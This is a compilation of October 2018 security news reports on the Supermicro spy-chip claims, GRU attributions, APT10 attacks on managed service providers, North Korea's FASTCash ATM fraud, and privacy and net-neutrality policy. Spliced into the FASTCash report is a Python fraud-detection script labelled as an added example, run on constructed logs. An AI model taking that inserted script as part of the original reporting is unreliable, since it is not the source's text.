“Public documents, including the company’s own promotional materials, show that the servers have been used inside Department of Defense data centers to process drone and surveillance-camera footage, on Navy warships to transmit feeds of airborne missions, and inside government buildings to enable secure videoconferencing. NASA, both houses of Congress, and the Department of Homeland Security have also been customers. This portfolio made Elemental a target for foreign adversaries.”

The tiny chips were designed to be implanted directly on the motherboards, the backbone for computer equipment used in data centers of the major US firms.

Amazon confirmed that it was not aware of the supply chain compromise.

“It’s untrue that AWS knew about a supply chain compromise, an issue with malicious chips, or hardware modifications when acquiring Elemental,” Amazon wrote.

Apple denied having found the spy chips on its equipment.

“On this we can be very clear: Apple has never found malicious chips, ‘hardware manipulations’ or vulnerabilities purposely planted in any server,” Apple wrote.

Canada Says it Was Targeted by Russian Cyber Attacks
5.10.2018 securityaffairs

Canada said Thursday it too was targeted by Russian cyber attacks, citing breaches at its center for ethics in sports and at the Montreal-based World Anti-Doping Agency, after allies blamed Moscow for some of the biggest hacking plots of recent years.

"The government of Canada assesses with high confidence that the Russian military's intelligence arm, the GRU, was responsible" for these cyber attacks, the foreign ministry said in a statement.

Ottawa said these formed "part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order."

And it called on "all those who value this order to come together in its defence."

Allies accused Russian military intelligence of being behind an April attempt to gain access to official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

The Netherlands expelled four alleged agents and Britain and Australia pointed fingers at Russian military intelligence, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The Russia-based Fancy Bears computer hacking group leaked athletes' medical records held by WADA, said the agency.

The same year, the Canadian Centre for Ethics in Sport was "compromised by malware enabling unauthorized access to the Centre's network," the foreign ministry said.

WADA has faced a backlash over its decision last month to lift a ban on Russia's anti-doping agency.

The agency had suspended RUSADA in November 2015 after declaring it non-compliant following revelations of a vast state-backed scheme to avoid drug testers.

A WADA report by Canadian lawyer Richard McLaren accused Russian authorities of running an elaborate doping program with the full support of the Russian Ministry of Sport and the Russian secret service (FSB).

The softening of WADA's stance triggered outrage from athletes and national anti-doping agencies around the world, who have accused WADA of succumbing to pressure from the IOC.

US to Let NATO Use its Cyber Defense Skills
5.10.2018 securityaffairs

The United States is expected to make its offensive cyber warfare capabilities available to NATO, officials said Wednesday, as the alliance seeks to strengthen its defenses against Russian electronic attacks.

Britain and Denmark have already publicly committed cyber resources to NATO, and Washington is expected to announce that it will follow suit on Thursday at a meeting of defence ministers in Brussels.

Alliance chief Jens Stoltenberg said cyber attacks on NATO countries were becoming "more frequent... more sophisticated... more coercive" and any contribution of cyber capabilities was welcome.

"We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict," Stoltenberg said.

The three Baltic states -- Lithuania, Latvia and Estonia -- say they come under near-daily cyber assault, with government departments, banking systems and the power grid coming in for attack, and point the finger at former Soviet ruler Russia.

Moscow is also blamed for interfering in various European elections through campaigns of disinformation on social media.

Most recently, Washington accused Russia of leading a disinformation campaign in Macedonia through social media to discourage voters from taking part in last weekend's referendum on changing the country's name.

The name change is crucial to Macedonia's hopes of joining NATO -- a step Moscow opposes.

Canada blames Russia for cyber attacks against its structures
5.10.2018 securityweek

The Government of Canada blamed the GRU, the Russian military’s intelligence agency, for cyber attacks at the Montreal-based World Anti-Doping Agency.

“The government of Canada assesses with high confidence that the Russian military’s intelligence arm, the GRU, was responsible” for these cyber attacks, the foreign ministry said in a statement.

Ottawa described the cyber attacks as “part of a broader pattern of activities by the Russian government that lie well outside the bounds of appropriate behavior, demonstrate a disregard for international law and undermine the rules-based international order.”

It called on “all those who value this order to come together in its defence.”

Canada and its allies accused Russia of an aggressive cyber strategy that continuously attempts to interfere in the politics of foreign states. The allies

Allies blamed the Kremlin for cyber attacks that in April targeted the official networks of the Organisation for the Prohibition of Chemical Weapons (OPCW).

In September the Dutch-based NRC newspaper and Swiss daily Tages-Anzeiger reported the Dutch intelligence services arrested two alleged Russian spies working for Russia’s GRU military intelligence service on suspicion of planning to hack the Spiez laboratory near Bern.

The laboratory conducts investigations for a global chemical arms watchdog, the Organisation for the Prohibition of Chemical Weapons (OPCW); its researchers were investigating the poisoning of former agent Sergei Skripal and his daughter in Salisbury.

The two agents carried equipment to hack into the network of the laboratory to spy on the activity of its researchers.

The Netherlands expelled four alleged agents, while the United States charged seven Russian agents with hacking the World Anti-Doping Agency (WADA) in 2016.

The foreign ministry added that in the same period the Canadian Centre for Ethics in Sport was “compromised by malware enabling unauthorized access to the Centre’s network.”

Britain and Australia also accused the Russian military intelligence of running a massive espionage campaign.

UK, Australia Blame Russia for Bad Rabbit, Other Attacks
5.10.2018 securityweek

The United Kingdom and Australia have officially blamed Russia for several high profile attacks, including the Bad Rabbit ransomware campaign.

A statement published by the U.K. government on Wednesday reveals that the country’s National Cyber Security Centre (NCSC) has linked several cyber threat actors to Russia’s GRU military intelligence service.

The NCSC believes that the GRU is behind the groups tracked by various security firms as APT28, Fancy Bear, Pawn Storm, Sofacy, Sednit, Cyber Caliphate, Cyber Berkut, BlackEnergy, Voodoo Bear, Strontium, Tsar Team and Sandworm. While many of these names represent the same threat actor, the line between the operations carried out by various Russian groups often gets blurred, as shown by the recent VPNFilter attack.

The NCSC says that the GRU is “almost certainly” responsible for the Bad Rabbit ransomware attack in October 2017, the August 2017 attack on the World Anti-Doping Agency (WADA), the 2016 attack on the U.S. Democratic National Committee (DNC), and an attack on a small TV station in the UK in the summer of 2015. It’s worth noting that the U.S. has previously accused Russia of election-related hacks and even charged 12 intelligence officers.

“The GRU’s actions are reckless and indiscriminate: they try to undermine and interfere in elections in other countries; they are even prepared to damage Russian companies and Russian citizens. This pattern of behaviour demonstrates their desire to operate without regard to international law or established norms and to do so with a feeling of impunity and without consequences,” said British Foreign Secretary Jeremy Hunt. “Our message is clear: together with our allies, we will expose and respond to the GRU’s attempts to undermine international stability.”

The Australian government has accused Russia’s GRU of the same attacks, but admitted that Australia itself was not significantly impacted by any of the campaigns.

“Cyberspace is not the Wild West. The International Community – including Russia – has agreed that international law and norms of responsible state behaviour apply in cyberspace. By embarking on a pattern of malicious cyber behaviour, Russia has shown a total disregard for the agreements it helped to negotiate,” reads a statement from Australia’s prime minister and minister of foreign affairs.

Australia says there must be consequences for these types of actions and public attribution is only the first step.

“It is unprecedented that the government should so overtly point the finger directly at the GRU. They must be very confident of their facts, either due to some sort of technical ‘fingerprint’ in the attack vectors themselves, or perhaps through corroboration from various other intelligence sources,” Malcolm Taylor, Director Cyber Advisory at ITC Secure and a former senior British intelligence officer, told SecurityWeek.

“But I think it’s also important to consider who benefits from attacks against these specific targets - WADA, Ukraine and the West in general. The answer to that question of course includes, and may indeed be limited to, Russia and Russian foreign policy interests. The mention of western businesses as targets should also be a reminder that foreign intelligence services do engage in commercial cyber espionage and we all need to take appropriate steps to manage that risk,” Taylor added.

U.S. Charges 7 Russian Intel Officers as West Condemns GRU
5.10.2018 securityweek

The U.S. Justice Department on Thursday charged seven Russian intelligence officers with hacking anti-doping agencies and other organizations hours after Western officials leveled new accusations against Moscow's secretive GRU military spy agency.

Hours before the U.S. indictment was announced, Western nations accused the GRU of new cybercrimes, with Dutch and British officials labeling the intelligence agency "brazen" for allegedly targeting the international chemical weapons watchdog and the investigation into the 2014 downing of a Malaysian Airlines flight over eastern Ukraine.

The U.S. indictment said that the GRU targeted its victims because they had publicly supported a ban on Russian athletes in international sports competitions and because they had condemned Russia's state-sponsored athlete doping program.

Prosecutors said that the Russians also targeted a Pennsylvania-based nuclear energy company and an international organization that was investigating chemical weapons in Syria and the poisoning of a former GRU officer.

The indictment says the hacking was often conducted remotely. If that wasn't successful, the hackers would conduct "on-site" or "close access" hacking operations, with trained GRU members traveling with sophisticated equipment to target their victims through Wi-Fi networks.

The GRU's alleged hacking attempts on the Organization for the Prohibition of Chemical Weapons took place in April and were disrupted by authorities, Dutch Defense Minister Ank Bijleveld said. Four Russian intelligence officers were immediately expelled from the Netherlands, she said.

Speaking about Russia's hacking attempts into the MH17 crash investigation, she said: "We have been aware of the interest of Russian intelligence services in this investigation and have taken appropriate measures."

The cascade of condemnation — from the Australian, British and Dutch governments — does more than just point the finger at Moscow. It also ties together a series of norm-shattering spy operations that have straddled the physical world and the digital sphere.

The British ambassador to the Netherlands said that the men caught with spy gear outside The Hague-based OPCW, for example, were from the very same GRU section (Unit 26165) accused by American investigators of having broken into the Democratic National Committee's email and sowing havoc during the 2016 U.S. presidential election.

The OPCW, in turn, was investigating the poisoning of GRU defector Sergei Skripal in which the nerve agent Novichok was used, a bold operation that British authorities dissected in a minute-by-minute surveillance camera montage last month.

At the same time, Australian and British spies have now endorsed the American intelligence community's reported attribution of the catastrophic June 2017 cyberattack on Ukraine to the GRU. The malicious software outbreak briefly knocked out cash machines, gas stations, pharmacies and hospitals and, according to a secret White House assessment recently cited by Wired, dealt $10 billion worth of damage worldwide.

The hack and release of sports figures' medical data in 2016 and the downing of MH17 over eastern Ukraine in 2014 also allegedly carry the GRU's fingerprints. Dutch investigators said the snoopers nabbed outside the OPCW also appear to have logged into the Wi-Fi networks near the World Anti-Doping Agency and the Malaysian hotels where crash investigators had gathered.

Moscow has issued the latest in a series of denials, but the allegations leveled by Western intelligence agencies, supported by a wealth of surveillance footage and overwhelmingly confirmed by independent reporting, paint a picture of the GRU as an agency that routinely crosses red lines — and is increasingly being caught red-handed.

Moscow has denied the allegations, but Russia's interests were at stake in both cases: the OPCW was investigating reports that a Soviet-made nerve agent had been used against a Russian ex-spy in England, and Russia has been blamed by some for being involved in shooting down MH17.

The leaders of Britain and the Netherlands condemned the GRU for "reckless" activities and vowed to defend vital international agencies from Russian aggression.

"This attempt, to access the secure systems of an international organization working to rid the world of chemical weapons, demonstrates again the GRU's disregard for the global values and rules that keep us all safe," British Prime Minister Theresa May and Dutch counterpart Mark Rutte said in a joint statement.

The coordinated actions by both countries came hours before an expected U.S. indictment involving Russian attempts to hack into computer systems.

The Dutch and British blamed Russia's GRU for "brazen" activities across the globe and for trying to cover up Russia's alleged participation in the nerve agent poisoning of Skripal and his daughter in March, and in the downing of MH17 over Ukraine, which killed all 298 people on board during a period of intense fighting between Ukrainian government forces and pro-Russia rebels. Russia has consistently denied involvement in the events.

Britain's ambassador to the Netherlands, Peter Wilson, said the GRU would no longer be allowed to act with impunity. Britain blames the secretive military intelligence unit for the nerve agent attack in March on former Russian spy Skripal and his daughter, Yulia, in the English city of Salisbury.

He said Russia's actions against the Netherlands-based OPCW came as the agency was conducting an independent analysis of the nerve agent used against the Skripals. Britain says the nerve agent was Novichok, produced in the Soviet Union, a finding later confirmed by the chemical weapons watchdog.

Earlier, British Defense Secretary Gavin Williamson branded a series of global cyberattacks blamed on Russia as the reckless actions of a "pariah state," saying that the U.K. and its NATO allies would uncover such activities in the future.

"Where Russia acts in an indiscriminate and reckless way, where they have done in terms of these cyberattacks, we will be exposing them," Williamson told reporters in Brussels at talks with U.S. Defense Secretary Jim Mattis and their NATO counterparts.

Britain's National Cyber Security Center said Thursday that four new attacks are associated with the GRU as well as earlier security hacks.

It cites attacks on the World Anti-Doping Agency, Ukrainian transport systems, the 2016 U.S. presidential race and others as very likely the work of the GRU.

"We are going to actually make it clear that where Russia acts, we are going to be exposing that action," Williamson said.

"This is not the actions of a great power. This is the actions of a pariah state, and we will continue working with allies to isolate them; make them understand they cannot continue to conduct themselves in such a way," he said.

Earlier, Australian Prime Minister Scott Morrison and Foreign Minister Marise Payne issued a joint statement that Australian intelligence agencies agreed that GRU "is responsible for this pattern of malicious cyber activity." They said Australia wasn't significantly impacted, but the cyberattacks caused economic damage and disrupted civilian infrastructure in other places.

DHS Warns of Attacks on Managed Service Providers
5.10.2018 securityweek

The United States Department of Homeland Security (DHS) this week issued an alert on ongoing activity from an advanced persistent threat (APT) actor targeting global managed service providers (MSPs).

The activity, DHS says, involves attempts to infiltrate the networks of global MSPs, which provide remote management of customer IT and end-user systems.

The use of MSPs increases an organization’s virtual enterprise infrastructure footprint, but also creates a large attack surface for cyber criminals and nation-state actors, DHS’ United States Computer Emergency Readiness Team (US-CERT) points out.

The newly released alert, TA18-276B, is related to activity that DHS' National Cybersecurity and Communications Integration Center (NCCIC) warned about in April 2017.

The same activity was associated by security firms with a Chinese actor referred to as APT10, but which is also known as menuPass and Stone Panda. The group is believed to be state-sponsored.

Tracked since 2009, the group has historically targeted mainly Japanese entities. Last year, the group was observed targeting entities in at least fourteen countries, including the website of a prominent U.S. trade association.

The threat actor is known for the use of a broad range of malware families, including the PlugX RAT, ChChes, Quasar, RedLeaves, the UPPERCUT backdoor, NetTraveler (aka TravNet), and ZeroT.

“Since May 2016, APT actors have used various tactics, techniques, and procedures (TTPs) for the purposes of cyber espionage and intellectual property theft. APT actors have targeted victims in several U.S. critical infrastructure sectors, including Information Technology (IT), Energy, Healthcare and Public Health, Communications, and Critical Manufacturing,” DHS’ new alert reads.

DHS’ new technical alert also includes information on the protective measures organizations should take to mitigate the risks associated with their MSP, which could expose them to APT activity.

These include restricting access to networks and systems, using a dedicated Virtual Private Network (VPN) for the MSP connection, using firewalls, implementing best practices for password and permission management, and incorporating operational controls.

China Used Tiny Chips on US Computers to Steal Secrets: Report
5.10.2018 securityweek

Tiny chips inserted in US computer equipment manufactured in China were used as part of a vast effort by Beijing to steal US technology secrets, a published report said Thursday.

The Bloomberg News report said the chips, the size of a grain of rice, were used on equipment made for Amazon, which first alerted US authorities, and Apple, and possibly for other companies and government agencies.

Bloomberg said a three-year secret investigation, which remains open, enabled spies to create a "stealth doorway" into computer equipment, a hardware-based entry that would be more effective and harder to detect than a software hack.

Citing unnamed US officials, Bloomberg said a unit of the People's Liberation Army was involved in the operation that placed the chips on equipment manufactured in China for US-based Super Micro Computer Inc.

Supermicro, according to Bloomberg, also manufactured equipment for Department of Defense data centers, the CIA's drone operations, and onboard networks of Navy warships.

The report said Amazon discovered the problem when it acquired software firm Elemental and began a security review of equipment made for Elemental by California-based Supermicro.

According to Bloomberg, the spy chips were designed for motherboards -- the nerve centers for computer equipment -- used in data centers operated by Apple, Amazon Web Services and others.

Apple said in a statement it "has never found malicious chips, 'hardware manipulations' or vulnerabilities purposely planted in any server."

A statement by Amazon to AFP said that "at no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in Supermicro motherboards in any Elemental or Amazon systems."

Supermicro could not immediately be reached for comment, but Bloomberg said the firm denied any knowledge of the espionage or investigation.

US offers its cyber warfare defense capabilities to NATO
4.10.2018 securityaffairs

The United States will offer its offensive cyber capabilities to NATO to strengthen its defenses against threat actors like Russian ones.
The United States is expected to announce that it will provide cyber warfare capabilities to NATO to strengthen its defenses against threat actors like Russian ones.

The announcement is expected today at a meeting of defence ministers in Brussels. The decision follows the public commitment of Britain and Denmark to provide cyber resources to NATO.

According to NATO chief Jens Stoltenberg, cyber attacks against members of the alliance are increasing in frequency and complexity; for this reason, it is essential to approach them with a joint effort and mutual collaboration.

Attackers are able to interfere with the political processes of countries, as already happened during the 2016 Presidential election, and to threaten critical infrastructure worldwide.

Stoltenberg said that cyber attacks on NATO countries were becoming “more frequent… more sophisticated… more coercive” and that any contribution of cyber capabilities was welcome.

“We see cyber being used to meddle in domestic political processes, attacks against critical infrastructure, and cyber will be an integral part of any future military conflict,” Stoltenberg said.

The critical infrastructure of Lithuania, Latvia and Estonia is under incessant attacks that they attribute to Russia.

Russia-linked APT groups are blamed for interference in several European elections and in the 2018 US midterm elections.

US intelligence accused the Kremlin of conducting a disinformation campaign in Macedonia through social media, aimed at sabotaging a referendum on changing the country’s name that could open the door of the NATO alliance to the country.

California Law Sets Up Fresh Legal Clash Over 'Net Neutrality'
4.10.2018 securityweek

The US Justice Department's lawsuit to block a California law aimed at ensuring all online data is treated equally sets up a legal clash over so-called "net neutrality" and the authority to regulate the internet.

California Governor Jerry Brown on Sunday signed the law that re-established net neutrality in his state, the country's largest and home to some of the largest online firms including Facebook and Google.

Within hours, the Trump administration sued to block the law, calling it an illegal infringement over federal authority.

"Under the constitution, states do not regulate interstate commerce -- the federal government does. Once again the California legislature has enacted an extreme and illegal state law attempting to frustrate federal policy," Attorney General Jeff Sessions said in a statement announcing the lawsuit.

The moves open up a new legal clash over net neutrality rules, which have been the subject of a contentious battle for over a decade.

Net neutrality backers argue that a law is needed to guard against broadband providers like Verizon and AT&T favoring their own services and blocking or slowing rival services like Netflix.

"This law will prevent internet service providers from unduly influencing internet traffic, thereby allowing Californians to continue to decide what content they want and when they want it, and allowing the online market to continue to flourish," said Eric Null of the New America Foundation's Open Technology Institute.

But critics claim restrictions will chill investment needed to ensure that new high-speed networks are built and innovative services offered.

Federal Communications Commission chairman Ajit Pai countered that the California law "hurts consumers" and infringes on federal authority.

"The law prohibits many free-data plans, which allow consumers to stream video, music, and the like exempt from any data limits," Pai said.

"The internet is free and open today, and it will continue to be under the light-touch protections" of current federal rules.

Long, winding road

The FCC adopted net neutrality rules twice starting in 2009, in both cases struck down by the courts which said the agency had no authority to regulate internet firms. A third effort in 2015 withstood a court challenge when the FCC reclassified broadband firms as telecom providers.

But last year, under Trump appointee Pai, the FCC reversed course and repealed net neutrality rules, which prompted several states to begin their own efforts.

Stanford University law professor Barbara van Schewick said she believes the California law will withstand the federal challenge and set a standard that will be followed in the US and around the world.

Van Schewick said in a blog post that while an FCC 2017 order explicitly bans states from adopting their own net neutrality laws, "that preemption is invalid."

"An agency that has no power to regulate has no power to preempt the states, according to case law," she said.

The law also marks the latest challenge between Brown's administration and President Donald Trump's Republicans, who have already clashed over environmental and immigration regulations.

USTelecom, which represents companies in the broadband sector, said it supports net neutrality but disagreed with the California law.

"Rather than 50 states stepping in with their own conflicting open internet solutions, we need Congress to step up with a national framework for the whole internet ecosystem and resolve this issue once and for all," the industry group said.

U.S. Links North Korean Government to ATM Hacks
4.10.2018 securityweek

U.S. Shares Details on North Korea’s ATM Cash-out Scheme

The United States Department of Homeland Security (DHS), Department of the Treasury (Treasury), and Federal Bureau of Investigation (FBI) this week released a joint technical alert to share information on an Automated Teller Machine (ATM) cash-out scheme attributed to the North Korean government.

The financially-motivated malicious campaign was attributed to the North Korea-linked threat actor the U.S. government refers to as Hidden Cobra, but which is better known in the infosec community as the Lazarus Group.

Considered the most serious threat to banks, the actor is believed to have orchestrated the $81 million heist from the Bangladesh bank. This year, the group was said to have been involved in numerous attacks against financial institutions and banks and to have also shown interest in crypto-currencies.

Last year, the U.S. started sharing details on the activity associated with Hidden Cobra, including information on the tools the actor employs in attacks, including malware such as Typeframe, Joanap and Brambul, Fallchil, and others. In September, U.S. authorities charged a North Korean national over his alleged involvement with Lazarus.

The most recent alert issued by the U.S. government on Hidden Cobra details FASTCash, a set of tactics the group has been using since at least 2016 to target banks in Africa and Asia and maintain presence on the victims’ networks for further exploitation.

As part of the FASTCash schemes, hackers remotely compromise payment switch application servers within banks to perform fraudulent transactions. The use of these tactics was highly successful and the group is expected to continue using them to target retail payment systems vulnerable to remote exploitation.

“According to a trusted partner’s estimation, HIDDEN COBRA actors have stolen tens of millions of dollars. In one incident in 2017, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs located in over 30 different countries. In another incident in 2018, HIDDEN COBRA actors enabled cash to be simultaneously withdrawn from ATMs in 23 different countries,” the joint alert reads.

The actor allegedly configured and deployed legitimate scripts on compromised servers to intercept legitimate financial requests and reply to them with fraudulent responses. The group leveraged knowledge of the standard for financial transaction messaging and other tactics to exploit the targeted systems.

The deployed scripts apparently inspected inbound financial request messages for specific primary account numbers (PANs) and could generate fraudulent responses only for the requests that matched the expected PANs.
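A defender-side illustration of the mechanism just described, added here and not taken from the joint alert or this article: if a payment switch answers withdrawal requests itself instead of forwarding them to the issuer host, the switch's own approved responses will have no matching issuer authorization record, and the same PAN will be approved at ATMs in several countries within minutes. The reconciliation checks below surface both symptoms from a bank's own logs. The key=value log format, field names (stan, pan, cc, rc), host/switch separation and thresholds are all assumptions made for the example, and the log lines are constructed.

```python
"""Reconciliation checks for the FASTCash pattern (added example, not the alert's code).

Assumed (constructed) log layout:
  - the payment switch logs one line per request and one per response,
    keyed by STAN (system trace audit number) and PAN (primary account number),
    with cc = ISO country code of the acquiring ATM and rc = response code
    ("00" = approved);
  - the issuer (core banking) host logs one line for every authorization it
    actually performed.
A switch approval with no issuer record is a response the switch produced on
its own, which is exactly what the deployed interception scripts did.
"""
from collections import defaultdict

# Constructed sample switch traffic: stan 000101 and 000106 are genuine,
# stan 000102-000105 are approvals for one PAN from four countries in 30 s.
SWITCH_LOG = """\
ts=1700000000 dir=req  stan=000101 pan=4111111111110001 cc=KE amt=20000
ts=1700000001 dir=resp stan=000101 pan=4111111111110001 cc=KE rc=00
ts=1700000010 dir=req  stan=000102 pan=4111111111110002 cc=KE amt=50000
ts=1700000011 dir=resp stan=000102 pan=4111111111110002 cc=KE rc=00
ts=1700000020 dir=req  stan=000103 pan=4111111111110002 cc=NG amt=50000
ts=1700000021 dir=resp stan=000103 pan=4111111111110002 cc=NG rc=00
ts=1700000030 dir=req  stan=000104 pan=4111111111110002 cc=GH amt=50000
ts=1700000031 dir=resp stan=000104 pan=4111111111110002 cc=GH rc=00
ts=1700000040 dir=req  stan=000105 pan=4111111111110002 cc=PH amt=50000
ts=1700000041 dir=resp stan=000105 pan=4111111111110002 cc=PH rc=00
ts=1700000050 dir=req  stan=000106 pan=4111111111110003 cc=KE amt=10000
ts=1700000051 dir=resp stan=000106 pan=4111111111110003 cc=KE rc=51
"""

# Constructed issuer-host log: only the two genuine transactions reached it.
ISSUER_LOG = """\
ts=1700000001 stan=000101 pan=4111111111110001 rc=00
ts=1700000051 stan=000106 pan=4111111111110003 rc=51
"""


def parse_kv(text):
    """Parse whitespace-separated key=value lines into dicts; ts becomes int."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        rec = dict(field.split("=", 1) for field in line.split())
        rec["ts"] = int(rec["ts"])
        records.append(rec)
    return records


def find_unbacked_approvals(switch_text, issuer_text):
    """Return STANs the switch approved without any issuer authorization record."""
    issuer_keys = {(r["stan"], r["pan"]) for r in parse_kv(issuer_text)}
    flagged = []
    for r in parse_kv(switch_text):
        if r.get("dir") == "resp" and r.get("rc") == "00":
            if (r["stan"], r["pan"]) not in issuer_keys:
                flagged.append(r["stan"])
    return sorted(flagged)


def find_multi_country_bursts(switch_text, min_countries=3, window_s=600):
    """Map PAN -> set of countries when one PAN is approved in >= min_countries
    distinct countries inside any window of window_s seconds."""
    approvals = defaultdict(list)
    for r in parse_kv(switch_text):
        if r.get("dir") == "resp" and r.get("rc") == "00":
            approvals[r["pan"]].append((r["ts"], r["cc"]))
    bursts = {}
    for pan, events in approvals.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            countries = {cc for t, cc in events[i:] if t - t0 <= window_s}
            if len(countries) >= min_countries:
                bursts[pan] = bursts.get(pan, set()) | countries
    return bursts


if __name__ == "__main__":
    print("approvals with no issuer record:", find_unbacked_approvals(SWITCH_LOG, ISSUER_LOG))
    print("multi-country bursts:", find_multi_country_bursts(SWITCH_LOG))
```

Both checks are cheap enough to run continuously against the switch's log stream; the first fires on a single fraudulent response, while the second is the back-stop for the case where the issuer log itself is unavailable or untrusted.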

While the initial infection vector hasn’t been identified, Lazarus is known for the use of spear-phishing emails in targeted attacks against bank employees and might have employed Windows-based malware “to explore a bank’s network to identify the payment switch application server.” Lateral movement was likely performed leveraging legitimate credentials.

Alongside the joint alert, the DHS also published a malware analysis report (MAR-10201537) to provide details on the malware Hidden Cobra used as part of the FASTCash attacks. Of a total of 10 files submitted for analysis, four were found to be malicious, two were command-line utility applications, three were apps offering export functions and methods to interact with financial systems, and one was a log file.

The identified malicious programs include Trojans and various backdoors that could retrieve system information, find and manipulate files, execute and terminate processes, download and upload files, and execute commands. In addition to Windows, the Trojans targeted IBM’s Advanced Interactive Executive (AIX) platform, which was running on the compromised payment switch application servers.

The FASTCash scheme only appears to have targeted banks in Africa and Asia, with no incidents observed in the U.S.

U.S. Energy Department Invests Another $28 Million in Cybersecurity
2.10.2018 securityweek

The U.S. Department of Energy on Monday announced that it’s investing up to $28 million in tools and technologies that will improve the resilience and cybersecurity of the power grid and oil and gas infrastructure.

The funding comes from the Office of Cybersecurity, Energy Security, and Emergency Response (CESER), which the DOE launched in February, and it aims to support the strategy described in the agency’s recently unveiled multiyear cybersecurity plan.

The money will support research, development and demonstration (RD&D) of innovative tools and technologies designed for preventing, detecting and mitigating cyber threats.

“Protecting the Nation’s energy delivery systems from cyber-threats is a top national priority,” said U.S. Secretary of Energy Rick Perry. “These awards will spur the next level of innovation needed to advance cyber resilience, ensuring that the Nation’s critical energy infrastructure can withstand potential cyber attacks while also still keeping the lights on.”

There are a total of 11 projects focusing on creating a cyber-resilient architecture for the electric and oil and natural gas subsectors, cybersecurity for oil and natural gas environments, secure communications, secure cloud-based technologies for operation technology (OT) networks, and technologies for enhancing cybersecurity in the energy sector.

Universities, national laboratories, and private-sector companies have teamed up for each of the projects. Award recipients include ABB, Dragos, GE Global Research, Schweitzer Engineering Laboratories (SEL), TDi, the Texas A&M Engineering Experiment Station, the United Technologies Research Center, and WhiteScope.


Industrial cybersecurity firm Dragos leads a project called The Neighborhood Keeper, which aims to develop a low-cost, cloud-based sensor network within OT networks to "enable integration of available technologies that will facilitate real-time and actionable information to reduce cyber risk.”

“Dragos is excited to be participating in a DOE program that helps expand accessibility to ICS cybersecurity,” Robert Lee, CEO of Dragos, said via email. “The secure, cost-effective architecture of Neighborhood Keeper is a service to the ICS community that will enable collaborative industrial control systems threat intelligence without the risk of sharing private information.”

This is not the first time the Energy Department announces significant investment in cybersecurity. Roughly one year ago it offered over $20 million for projects focusing on cybersecurity, and earlier this year it announced awards of up to $25 million for technologies designed to protect the country’s energy infrastructure against cyber threats.

EU Lawmakers Push for Cybersecurity, Data Audit of Facebook
28.9.2018 securityweek

BRUSSELS (AP) — European Union lawmakers appear set this month to demand audits of Facebook by Europe's cybersecurity agency and data protection authority in the wake of the Cambridge Analytica scandal.

A draft resolution submitted Thursday to the EU Parliament's civil liberties and justice committee urged Facebook to accept "a full and independent audit of its platform investigating data protection and security of personal data."

The assembly summoned Facebook CEO Mark Zuckerberg in May to testify about allegations that political consulting firm Cambridge Analytica used the data of millions of Facebook users to target voters during political campaigns, including the one that brought U.S. President Donald Trump to office.

Claude Moraes, the chairman of the EU parliamentary committee who drafted the resolution, said the probes "need to be done."

"Not only have Facebook's policies and actions potentially jeopardized citizens' personal data, but then they have also had an impact on electoral outcomes and on the trust citizens pose in digital solutions and platforms," Moraes said.

The committee aims to adopt the resolution, which will almost certainly be modified, by Oct. 10 and put it to the full assembly for endorsement in late October, well ahead of EU elections next May.

The resolution also urges European justice authorities to investigate any alleged "misuse of the online political space by foreign forces," and calls on the EU's executive Commission to propose ways to boost the powers of Europe's public prosecutor's office so it can tackle crimes against electoral infrastructure.

It notes "with regret" that Facebook did not send staff with the right technical knowledge to answer lawmakers' questions and "points out that such an approach is detrimental to the trust European citizens have in social platforms."

Zuckerberg was questioned in Brussels on May 22, but the lawmakers used up most of the speaking time with their own remarks, leaving the Facebook chief with little time to respond.

Senate Panel to Hear From Internet Execs on Privacy Policies
27.9.2018 securityweek

The Trump administration is hoping Congress can come up with a new set of national rules governing how companies can use consumers' data that finds a balance between "privacy and prosperity."

But it will be tricky to reconcile the concerns of privacy advocates who want people to have more control over the usage of their personal data — where they've been, what they view, who their friends are —and the powerful companies that mine it for profit.

Executives of a half-dozen U.S. internet titans are due to appear Wednesday before the Senate Commerce Committee to explain their privacy policies. Senior executives from AT&T, Amazon, Apple, Google, Twitter and Charter Communications are expected to testify at the hearing, amid increasing anxiety over safeguarding consumers' data online and recent scandals that have stoked outrage among users and politicians.

But the approach to privacy legislation being pondered by policymakers and pushed by the internet industry leans toward a relatively light government touch.

An early move in President Donald Trump's tenure set the tone on data privacy. He signed a bill into law in April 2017 that allows internet providers to sell information about their customers' browsing habits. The legislation scrapped Obama-era online privacy rules aimed at giving consumers more control over how broadband companies like AT&T, Comcast and Verizon share that information.

Allie Bohm, policy counsel at the consumer group Public Knowledge, says examples abound of companies not only using the data to market products but also to profile consumers and restrict who sees their offerings: African Americans not getting access to ads for housing, minorities and older people excluded from seeing job postings.

The companies "aren't going to tell that story" to the Senate panel, she said. "These companies make their money off consumer data."

What is needed, privacy advocates maintain, is legislation to govern the entire "life cycle" of consumers' data: how it's collected, used, kept, shared and sold.

Meanwhile, regulators elsewhere have started to act.

The 28-nation European Union put in strict new rules this spring that require companies to justify why they're collecting and using personal data gleaned from phones, apps and visited websites. Companies also must give EU users the ability to access and delete data, and to object to data use under one of the claimed reasons.

A similar law in California will compel companies to tell customers upon request what personal data they've collected, why it was collected and what types of third parties have received it. Companies will be able to offer discounts to customers who allow their data to be sold and to charge those who opt out a reasonable amount, based on how much the company makes selling the information.

The California law doesn't take effect until 2020 and applies only to California consumers, but it could have fallout effects on other states. And it's strong enough to have rattled Big Tech, which is seeking a federal data-privacy law that would be more lenient toward the industry.

"A national privacy framework should be consistent throughout all states, pre-empting state consumer-privacy and data security laws," the Internet Association said in a recent statement. The group represents about 40 big internet and tech companies, spanning Airbnb and Amazon to Zillow. "A strong national baseline creates clear rules for companies."

The Trump White House said this summer that the administration is working on it, meeting with companies and other interested parties. Thune's pronouncement and one from a White House official stress that a balance should be struck in any new legislation — between government supervision and technological advancement.

The goal is a policy "that is the appropriate balance between privacy and prosperity," White House spokeswoman Lindsay Walters said. "We look forward to working with Congress on a legislative solution."

Senate Committee Approves Several Cybersecurity Bills
27.9.2018 securityweek

The U.S. Senate Committee on Homeland Security and Governmental Affairs on Wednesday voted to approve several cybersecurity bills, including ones related to incident response, supply chain security, the government’s cyber workforce, and safeguarding federal information systems.

